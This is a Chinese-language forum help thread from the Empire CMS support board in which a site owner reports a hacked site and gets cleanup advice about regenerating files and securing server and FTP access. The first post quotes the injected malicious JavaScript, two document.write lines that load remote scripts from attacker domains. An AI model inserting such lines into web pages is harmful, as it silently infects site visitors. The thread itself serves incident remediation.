帝国论坛帝国软件产品与服务帝国下载系统[求助]网站被人挂马 【本版专题贴子】  
主题:[求助]网站被人挂马 [加入收藏夹]   

qq51326
用户头衔:秀才

精华贴   :0
发贴数   :121
经验值   :505
注册时间:2009-01-28
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 1 楼]
[求助]网站被人挂马
网站被人挂马,被挂马的文件为:/data/js/class.js
主要毒代码为:
document.write('<script language="javascript" type="text/javascript" src="http://b.ycfufeng.cn/tj.js"></script>');
document.write('<script language="javascript" type="text/javascript" src="http://www.senyiyy.com/he/tj.js"></script>');
/data/js/class.js好像是更新网站某一地方就会自动更新,现在我选择更新全站,“/data/js/class.js”文件也不更新,“/data/js/”下的文件也不更新,如何让“/data/js/”目录下的所有文件都更新?




2016-03-28 23:45:53 已设置保密 顶部 回复 引用 报告 编辑 删除

零距离
用户头衔:探花

精华贴   :0
发贴数   :4834
经验值   :12848
注册时间:2007-12-26
信息 搜索 好友 发送悄悄话 免费开源-EBMA系统:更安全的MYSQL管理和备份系统】   [第 2 楼]

删除掉这个文件,然后登录后台管理分类,修改某一个分类名称,然后再改回来就会重新生成了
文件被批量改的?估计有服务器权限了,检查服务器安全和ftp密码别搞太弱




2016-03-29 08:02:09 已设置保密 顶部 回复 引用 报告 编辑 删除

qq51326
用户头衔:秀才

精华贴   :0
发贴数   :121
经验值   :505
注册时间:2009-01-28
信息 搜索 好友 发送悄悄话 精益求精-帝国网站管理系统7.5正式版开源发布】   [第 3 楼]

谢谢大侠指点。网站已经恢复正常。
经查毒代码是加在/data/js/class.js文件上的,这个文件好像是分类栏目的,每个页面都会调入分类栏目,同时毒代码也一同被加载,这个毒代码只是对来路为百度、谷歌、360等搜索执行毒动作,直接打开是不执行毒动作的。
不能更新/data/js/class.js的原因是我给所有的文件夹都禁止写入了,允许写入就能更新了。




2016-03-30 01:52:21 已设置保密 顶部 回复 引用 报告 编辑 删除

快速回复
内容

表情
使用EBB代码 使用smile代码 显示签名 自动分析url 自动分析img
     【进入高级模式】   (按 Ctrl+Enter 直接提交)
    顶部  加入收藏夹
关于帝国 | 广告服务 | 联系我们 | 法律声明 | 隐私条款 | 许可协议
Powered by: EBB Version 2.2.1